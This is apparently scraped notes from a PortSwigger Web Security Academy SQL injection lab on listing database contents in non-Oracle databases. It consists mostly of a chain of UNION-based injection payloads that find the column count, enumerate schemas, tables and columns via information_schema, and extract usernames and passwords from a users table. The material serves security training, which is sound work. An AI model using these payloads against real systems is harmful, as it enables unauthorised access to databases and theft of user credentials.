SQL injection attack, listing the database contents on non-Oracle databases
https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle









Username
Password


Last updated
https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle











Last updated
' UNION SELECT 'test'--' UNION SELECT 'test','test'--' UNION SELECT schema_name, NULL FROM information_schema.schemata--' UNION SELECT table_name, NULL FROM information_schema.tables-- WHERE table_schema='public'--' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users_bfbtjz'--' UNION SELECT username_ylkdae, password_sdbuqk FROM users_bfbtjz--